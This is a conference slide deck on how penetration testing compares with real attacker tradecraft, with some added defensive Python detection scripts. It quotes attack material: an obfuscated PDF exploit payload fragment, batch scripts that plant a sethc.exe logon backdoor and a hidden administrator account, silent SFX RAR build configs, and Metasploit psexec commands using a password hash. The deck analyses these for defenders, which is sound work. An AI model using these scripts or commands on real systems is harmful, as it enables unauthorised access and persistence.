Evolution of PenTesting - CounterMeasure 2019
Introduction
• Name: Russ Gideon
• Title: Director of Malware Research
• Contact: [email protected]
• Twitter: @gideonsecurity
• Background:
– Led numerous Red Teams
– Foreign attack profiling and reverse engineering
– Recent work in integration of malware and attack profiling attributes in Attack Research penetration testing
Evolution
• What is this talk?
– A dissection of real world attacks and some of their effects on penetration testing.
– Reflection on real offensive operators vs
penetration testers
– Conclusions are derived mainly from a forensics/binary analysis perspective
• What this talk is not!
– A slam on current penetration testing tools!
Evolution
• 1960s discussions about Time Sharing
computers being vulnerable
– RAND Corporation
– NSA
• Coined the term “penetration” for this
• Evolved into Tiger Teams
• Influential people in this, from a historical perspective
– Willis Ware
The Birth Of an Industry
Industry realized we need to behave like attackers to learn how to defend against them.
Henceforth the industry we all know and love is born.
Evolution Of an Industry
• Industry gets bigger
• Tools become a commodity
• Attackers evolved and changed tactics
– Employed varying degrees of malware
– Deception
– Leverage protocol and design flaws
– Evasion and anti-analysis techniques
• The industry tools also evolved, but not in the
same manner
Memory corruption == $$$
• Tools become commodity
• The shift begins
• Attackers are closed source and don’t release
We Make Strange Bedfellows
Offensive Operators
Why do we call it APT?
• “APT” != Advanced
• Clever != Advanced
• Attackers work as hard as they have to but not
any harder
– As we step up the defense game they have to
work harder
– Currently that game is not too difficult (in most
places)
Outline
• Getting In
• APT Lateral Movement vs Pentesters Lateral
Movement
• Staging The Attack
Getting In – Spear Phishing
Getting In
• Example
– CVE 2010-2883
• Stack-based buffer overflow in CoolType.dll
• Very popular for targeted spear phishing
• 22 unique samples with this exploit in them
– 7 of these samples are made with metasploit’s module for this
– Case study
• Targeted Attack With a PDF
– D4169301AFBC86A04135EBC4A6A4BADB.pdf
Getting In
• Metasploit has a great module for 2010-2883
• If a host isn’t vulnerable then it will drop and
open a clean “Hello World” PDF
Getting In
• D4169301AFBC86A04135EBC4A6A4BADB.pdf
• Includes this data stream
• Look familiar?
Getting In
• The shellcode is the only significant difference
between the “APT” sample and a general
metasploit created PDF
Getting In
WjozzFaiSj = unescape
var nXzaRHPbywaqAbGpGx0t0zGkvQWhu =
"\x25\x754141\x25\x754141%63a5%u4a80\0x25
snip..... 0x75fa65%uec10%u0937%ufb0c%ufd97.......snip
...%ud045%uc689%uc789%uc981\x25\x75ffff\x25\x75ffff%uc031%uaef2"
Using MSF DEP/ASLR Bypass
seg000:00000136 db 84h
seg000:00000137 db 4Ah
seg000:00000138 db 92h
seg000:00000139 db 0B6h
seg000:0000013A db 80h
seg000:0000013B db 4Ah
seg000:0000013C db 0FFh
seg000:0000013D db 0FFh
seg000:0000013E db 0FFh
seg000:0000013F db 0FFh
seg000:00000140 db 0FFh
seg000:00000141 db 0FFh
seg000:00000142 db 0FFh
seg000:00000143 db 0FFh
seg000:00000144 db 0FFh
seg000:00000145 db 0FFh
seg000:00000146 db 0FFh
seg000:00000147 db 0FFh
seg000:00000148 db 0
seg000:00000149 db 10h
seg000:0000014A db 0
seg000:0000014B db 0
MSF Created PDF / APT Created PDF with MSF: the same byte sequence appears in both.
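A triage routine for the sample above: peel both escape layers (the \x25\x75 spelling of %u, then unescape) and look for the byte sequence from the listing. This is an added Python example, not code from the talk; the literal it decodes is constructed to carry those marker bytes rather than the slide's snipped string.

```python
import re

# Byte sequence copied from the listing above (seg000:0136..014B), shared by the
# MSF-built PDF and the APT-built one: the CoolType DEP/ASLR bypass chain.
MSF_COOLTYPE_MARKER = (bytes([0x84, 0x4A, 0x92, 0xB6, 0x80, 0x4A])
                       + b"\xFF" * 12
                       + bytes([0x00, 0x10, 0x00, 0x00]))

_JS_HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
_UNESCAPE_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def resolve_js_string_escapes(literal: str) -> str:
    """Layer 1, the JavaScript string literal: '\\x25\\x75' is simply '%u' spelled
    out so a naive grep for '%u' sees fewer hits. Only \\xNN escapes are handled."""
    return _JS_HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def js_unescape(s: str) -> str:
    """Layer 2, what JavaScript's unescape() returns: %uXXXX becomes one UTF-16
    code unit, %XX one code point below 256, everything else is kept as-is."""
    return _UNESCAPE_TOKEN.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_payload_literal(literal: str) -> bytes:
    """Bytes as they would sit in memory: the unescaped string laid out as UTF-16LE.
    surrogatepass keeps lone %uD8xx-style units instead of raising."""
    text = js_unescape(resolve_js_string_escapes(literal))
    return text.encode("utf-16-le", "surrogatepass")


def find_msf_marker(payload: bytes) -> int:
    """Offset of the shared chain inside the decoded payload, or -1."""
    return payload.find(MSF_COOLTYPE_MARKER)


def obfuscation_indicators(literal: str) -> dict:
    """How often '%u' is written plainly versus as '\\x25\\x75'. A mix of both in
    one literal, as in the slide's sample, is itself a triage signal."""
    return {"plain_percent_u": literal.count("%u"),
            "escaped_percent_u": literal.count(r"\x25\x75")}


# Constructed sample literal (not the slide's string): mixes both spellings of
# '%u' and encodes 'AAAA', the marker bytes, then a two-byte NOP pad.
SAMPLE_LITERAL = (r"\x25\x754141%u4141\x25\x754a84%ub692%u4a80"
                  r"\x25\x75ffff%uffff%uffff\x25\x75ffff%uffff%uffff%u1000%u0000%u9090")


def triage(literal: str) -> dict:
    payload = decode_payload_literal(literal)
    result = obfuscation_indicators(literal)
    result["decoded_length"] = len(payload)
    result["msf_marker_offset"] = find_msf_marker(payload)
    return result


if __name__ == "__main__":
    print(triage(SAMPLE_LITERAL))
```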
Side Note
• The original sample from contagio
– Dropper is igfxver.exe
– AV family of Chifrax
• D4169301AFBC86A04135EBC4A6A4BADB.pdf
– Dropper is AcroRd32.exe in temp
– %TEMP%\AcroRd32.exe drops and starts
• rundll32.exe "C:\WINDOWS\system32\wuausrv.dll",TStartUp 0x11
– AV family of Protux
– Delivered ~2 weeks later
Getting In Conclusion
• Pen Tester: SING Table CoolType DLL overflow MSF module with PDF dropper
– Not a white-hat-based disclosure
– Originally found in a targeted campaign
• http://contagiodump.blogspot.com/search/label/CVE-2010-2883
• Attacker: Rip off MSF Module
– This attack used the metasploit module
– Change out shellcode
• Added obfuscation
• Verdict: Attacker rips off another attacker's tactic and makes it better
Outline
• Getting In
• APT Lateral Movement vs Pen Testers Lateral
Movement
• Staging The Attack
Lateral Movement
APT Lateral Movement
• Case Study:
a1765a7f3376c76d8c23766a92f1cb6b.exe
– Nps.exe
• Sample from IR we conducted
• In a nutshell, their own PSEXEC for shoveling shells
Lateral Movement
• General flow of the sample
– From controlling node
• Execute: nps.exe -install $Victim NPServer
• Drops nps.exe on \\victim\Admin$\system32
• Creates a service around nps.exe (named NPServer) on
remote server and starts it
• Named pipes created on victim host and used for
communications
– NPStdin
– NPStdout
Lateral Movement
• Based upon arguments it is a service binary or
drops the communication piece on the remote
host
Lateral Movement
• Dropper to the victim
Lateral Movement
• Remote named pipes for all communications (controlling host <-> victim host)
Lateral Movement
• Taking advantage of credential authorization
• Of course won’t work in all situations
– Account needs to have administrative privileges
– Vista and up
• Credentials have to be domain based
• Local administrative credentials can’t write to C$ and
Admin$
Forensic Evidence
Pen Testers Forensic Evidence
• Metasploit has the same capability with
PSEXEC
• General flow
– Pushes service executable with payload to
\\victim\Admin$\system32
– Uses DCERPC to create a service around the
service binary on victim host
– Starts the service on the victim
– Uses payload defined variables for communication
Usage
• msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST                       yes       The target address
RPORT      445              yes       Set the SMB service port
SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
SMBPass                     no        The password for the specified username
SMBUser                     no        The username to authenticate as
Major Differences!
• NPS.exe usage screen shows the flexibility to alter the forensic evidence you leave behind
• Metasploit doesn’t have this capability
• Derives its service name and display name
from 2 pieces of code in the module
– Service name generation looks like
• servicename = rand_text_alpha(8)
– Display name generation looks like:
• displayname = 'M' + rand_text_alpha(rand(32)+1)
Major Differences
• Not Blending in!
– rand_text_alpha(8)
– 'M' + rand_text_alpha(rand(32)+1)
Lateral Movement Solution
• A few lines added to the psexec module and
we have some flexibility now
– Register two new options
• SVCName
– The Service name you want to use. This will be what is left
over in the registry under HKLM\CurrentControlSet\services if
the service is not cleaned up
• DisplayName
– This is the display name of the service that will show up in the
event logs
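Two defender-side checks over Event ID 7045 service-install records: the naming heuristic implied by the two rand_text_alpha lines quoted earlier, and a baseline comparison that still fires when a tester or attacker picks a blend-in name such as NPServer. Added Python example, not part of the talk or of psexec_ar; the log lines and the baseline set are constructed.

```python
import re
from typing import Dict, List, Set, Tuple

# Derived from the two lines of the stock psexec module quoted on the slides:
#   servicename = rand_text_alpha(8)                  -> exactly 8 letters
#   displayname = 'M' + rand_text_alpha(rand(32)+1)   -> 'M' then 1..32 letters
MSF_SERVICE_NAME = re.compile(r"^[A-Za-z]{8}$")
MSF_DISPLAY_NAME = re.compile(r"^M[A-Za-z]{1,32}$")

# Constructed baseline of service names from a clean image (a real one would be
# exported from a known-good host of the same build).
BASELINE_SERVICES: Set[str] = {"Spooler", "Dnscache", "LanmanServer", "wuauserv"}

# Constructed System-log records in the style of Event ID 7045 ("A service was
# installed in the system"), flattened to one line per event. Not real log data.
SAMPLE_7045_LOG = r"""
7045 host=ws01 ServiceName=qRkTwXpL DisplayName=MaZqpLwt ImagePath=%SystemRoot%\qRkTwXpL.exe
7045 host=ws02 ServiceName=NPServer DisplayName=NPServer ImagePath=%SystemRoot%\system32\nps.exe
7045 host=ws03 ServiceName=Spooler DisplayName=Print Spooler ImagePath=%SystemRoot%\System32\spoolsv.exe
"""

# key=value pairs; a value runs until the next " key=" so display names may have spaces
_FIELD = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_7045_line(line: str) -> Dict[str, str]:
    return dict(_FIELD.findall(line))


def looks_like_msf_psexec(service_name: str, display_name: str) -> bool:
    """Naming heuristic: only the unmodified module trips it. psexec_ar with
    SVCName/DisplayName set, or the attacker's NPServer, walks straight past it."""
    return bool(MSF_SERVICE_NAME.match(service_name) and MSF_DISPLAY_NAME.match(display_name))


def triage_service_installs(log_text: str, baseline: Set[str]) -> List[Tuple[str, str, List[str]]]:
    """Returns (host, service name, reasons) for every install worth a look."""
    findings = []
    for line in log_text.splitlines():
        if not line.startswith("7045 "):
            continue
        f = parse_7045_line(line)
        reasons = []
        if looks_like_msf_psexec(f["ServiceName"], f["DisplayName"]):
            reasons.append("metasploit-psexec-naming")
        if f["ServiceName"] not in baseline:
            # name-agnostic: any service the golden image does not have
            reasons.append("not-in-baseline")
        if reasons:
            findings.append((f["host"], f["ServiceName"], reasons))
    return findings


if __name__ == "__main__":
    for host, svc, why in triage_service_installs(SAMPLE_7045_LOG, BASELINE_SERVICES):
        print(host, svc, ", ".join(why))
```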
Lateral Movement Solution
• psexec_ar options
msf exploit(psexec_ar) > set DisplayName NPServer
msf exploit(psexec_ar) > set RHOST victim
msf exploit(psexec_ar) > set SMBDomain ""
msf exploit(psexec_ar) > set SMBUser Administrator
msf exploit(psexec_ar) > set SMBPass E52CAC67449B9A233A3B108F3FA6CB6D:8846F72AE28FB127AD06BED830B7586
msf exploit(psexec_ar) > set SVCName NPServer
msf exploit(psexec_ar) > set SERVICE_FILENAME NPServer.exe
msf exploit(psexec_ar) > set EXE::Custom mycustom.exe
msf exploit(psexec_ar) > exploit
Lateral Movement Solution
Available on GitHub
https://github.com/AttackResearch/Metasploit/blob/master/modules/exploits/psexec_ar.rb
Lateral Movement Conclusion
• Pen Tester: MSF Psexec module
– Randomized service names
– Obvious “badness”
– Very loud
• Attacker: Custom psexec type functionality
– Blend in and look normal
– Uses named pipes for communication
– Very basic backdoor that still isn't caught by AV
• Verdict: Superior attacker technique, less likely to get caught
Outline
• Getting In
• APT Lateral Movement vs Pen Testers Lateral
Movement
• Staging The Attack
Staging The Attack
• Automation is the key
• Humans make mistakes
• Automate the post exploitation
– Sounds “advanced” doesn’t it?
Why Raise The Bar?
• Found on various C2 hosts and on the victims
– MM.exe
• Simple automation of their attack
– Helps them for speed
– Helps us know how they will operate in environments next time
• Rar files aren’t just for exfiltration
Why Raise The Bar?
• Dissection of mm.exe
– Self-extracting (SFX) RAR file
– Drops 2.bat and mm.exe in C:\Temp
– C:\Temp\mm.exe isn’t the same as the original
mm.exe
• New mm.exe
• Another UPX packed SFX
– Drops 22.bat and net1.exe in C:\Temp
Why Raise The Bar?
• 2.bat
copy %windir%\explorer.exe %windir%\system32\explorer1.exe
copy %windir%\system32\sethc.exe %windir%\system32\asethc.exe
copy c:\temp\mm.exe %windir%\system32\dllcache\magnify.exe
copy c:\temp\mm.exe %windir%\system32\magnify1.exe
del %windir%\system32\sethc.exe
del %windir%\system32\magnify.exe
c:
cd %windir%\system32\
ren explorer1.exe sethc.exe
ren magnify1.exe magnify.exe
Why Raise The Bar?
• 22.bat
c:\temp\net1.exe user syslem$ /active:y
c:\temp\net1.exe user SYSLEM$ qazwsx!@#123
c:\temp\net1.exe user SYSLEM$ qazwsx!@#123 /add
c:\temp\net1.exe localgroup Administrators syslem$ /add
• Now they have
– Persistence
– Communications
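Host checks for what 2.bat and 22.bat leave behind: an accessibility binary that is really another executable, and a local administrator whose name imitates a built-in account. Added Python example, not from the talk; the file contents, golden hashes and account list are constructed stand-ins for what an agent would read from a real host.

```python
import hashlib
from typing import Dict, List, Tuple

# Binaries reachable from the Windows logon screen; 2.bat swaps two of them.
ACCESSIBILITY_BINARIES = {"sethc.exe", "magnify.exe", "utilman.exe", "osk.exe",
                          "narrator.exe", "displayswitch.exe"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_accessibility_binaries(files: Dict[str, bytes], known_good: Dict[str, str]) -> List[str]:
    """files: path under %windir% -> content; known_good: file name -> expected sha256.
    Flags an accessibility binary whose hash differs from the golden copy, and one whose
    content equals a differently named executable (explorer.exe renamed to sethc.exe).
    The dllcache copy is checked too: 2.bat replaces it because Windows File
    Protection restores system32 from there."""
    digests = {path: sha256_hex(data) for path, data in files.items()}
    findings = []
    for path, digest in digests.items():
        name = path.rsplit("/", 1)[-1].lower()
        if name not in ACCESSIBILITY_BINARIES:
            continue
        if known_good.get(name) != digest:
            findings.append(f"{path}: hash differs from golden copy")
        for other, other_digest in digests.items():
            if other_digest == digest and other.rsplit("/", 1)[-1].lower() != name:
                findings.append(f"{path}: identical to {other}")
    return findings


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance, enough for one-character look-alikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


IMITATED_NAMES = ("system", "administrator", "admin", "guest")


def check_suspicious_accounts(accounts: List[Tuple[str, bool]]) -> List[str]:
    """accounts: (user name, is member of local Administrators). Flags a trailing '$'
    (machine-account styling on a local user) and one-edit look-alikes of built-in
    names, which is exactly what 22.bat's syslem$ is."""
    findings = []
    for name, is_admin in accounts:
        base = name.rstrip("$").lower()
        reasons = []
        if name.endswith("$"):
            reasons.append("machine-account-style name on a local user")
        for target in IMITATED_NAMES:
            if base != target and edit_distance(base, target) <= 1:
                reasons.append(f"look-alike of '{target}'")
        if reasons and is_admin:
            reasons.append("member of Administrators")
        if reasons:
            findings.append(f"{name}: " + "; ".join(reasons))
    return findings


# Constructed stand-ins for file contents (a few bytes instead of real PE images)
# laid out as 2.bat leaves them; KNOWN_GOOD hashes the pristine contents.
SAMPLE_FILES = {
    "system32/explorer.exe": b"MZ constructed explorer image",
    "system32/sethc.exe": b"MZ constructed explorer image",      # explorer1.exe -> sethc.exe
    "system32/magnify.exe": b"MZ constructed mm.exe payload",    # magnify1.exe -> magnify.exe
    "system32/dllcache/magnify.exe": b"MZ constructed mm.exe payload",
    "system32/utilman.exe": b"MZ constructed utilman image",     # untouched
}
KNOWN_GOOD = {
    "sethc.exe": sha256_hex(b"MZ constructed sethc image"),
    "magnify.exe": sha256_hex(b"MZ constructed magnify image"),
    "utilman.exe": sha256_hex(b"MZ constructed utilman image"),
}
# Constructed local account list as it would look after 22.bat ran.
SAMPLE_ACCOUNTS = [("Administrator", True), ("jsmith", False), ("syslem$", True)]

if __name__ == "__main__":
    for line in check_accessibility_binaries(SAMPLE_FILES, KNOWN_GOOD) + check_suspicious_accounts(SAMPLE_ACCOUNTS):
        print(line)
```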
Why Raise The Bar?
• Build the SFX RAR file
– Rar.exe a -sfxDefault.sfx -zsettings.conf mm2.exe mm.exe 2.bat
– Settings.conf:
;The comment below contains SFX script commands
Path=C:\Temp\
SavePath
Overwrite=1
Silent=1
Setup=2.bat
![Page 52: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/52.jpg)
5252
Why Raise The Bar?
• Build the SFX RAR file
– Rar.exe a -sfxDefault.sfx -zsettings1.conf mm.exe C:\Windows\System32\net1.exe 22.bat
– Settings1.conf:
;The comment below contains SFX script commands
Path=C:\Temp\
SavePath
Overwrite=1
Silent=1
Setup=22.bat
![Page 53: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/53.jpg)
5353
Staging The Attack Conclusion
• Pen Tester: Possible MSF Module
– There really isn’t a tool comparison
– Make a metasploit module for this?
– Working harder than we have to?
• Attacker: Attack Process is Automated
– No need for a complex framework
– Works into attackers tool set
– Leverage system resources and that is it
• Verdict: Attacker technique is simple and effective. Doesn't work harder than it has to
![Page 54: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/54.jpg)
5454
Conclusions
• Every attack (and group/person) has its
characteristics as do pen testers
• The objectives of a pen tester are usually much different from those of a nation-state operator or black hat
– Pen tests have a ton of constraints
– Pen testers are there to test for vulnerabilities
• Which is needed
– This is not testing the system as a whole
• How does your system react to a true compromise
![Page 55: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/55.jpg)
5555
Conclusions
• Testing the system as whole
– Targeted attacks affect the whole system
– Penetration testing really just looks for vulnerabilities
• We have corrupted the term “penetration tests”
– Pen Test = 20K cheap scan and assessment
• Attack Modeling and Simulations aren't the same as our current definition of penetration tests
![Page 56: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/56.jpg)
5656
Attack Simulations and Modeling
• Testing the system as whole:
– Monitoring
– Triage process
– Incident Response process
• Your operations and your vendors
– Business con-ops
– Disaster recovery
• If you pull the plug on your network you are in disaster
recovery!
![Page 57: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/57.jpg)
5757
Attack Simulations: Case Study
![Page 58: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/58.jpg)
5858
Attack Simulations
• What’s the difference between a fire inspector and a fireman?
• Fire inspectors are hired to => Inspect
– Exit lights are working
– Fire alarms are working
– Fire extinguishers are up to par
• Firemen are hired to => Respond
– Fires
– Medical emergencies
– Large scale disasters
![Page 59: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/59.jpg)
5959
Attack Simulations
• Do not have your incident response capability behave as fire inspectors
• They are needed to respond, not inspect
• We must start training the IR capability
– More than just penetration testing of them
• What are firemen doing while they are "down"?
– Training
• Is your IR team technically capable of handling an incident?
– Reverse Engineering
– PCAP Analysis
– Log mining
• Does the business know how to use them?
![Page 60: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/60.jpg)
6060
Attack Simulations
• You might not be ready for a full stress test of your environment
• Engage someone that has done this work and see what they can do.
• More than likely there is a lot they can do with and for you
– Testing your NOC/IR Ops
– Testing your detection tools/capabilities
– Modeling attacker workflows and how it relates to your data
![Page 61: Evolution of PenTesting - CounterMeasure 2019€¦ · Evolution • What is this talk? – A dissection of real world attacks and some of its affects on penetration testing. – Reflection](https://reader033.vdocument.in/reader033/viewer/2022060218/5f0680487e708231d4184dd2/html5/thumbnails/61.jpg)
6161
Questions?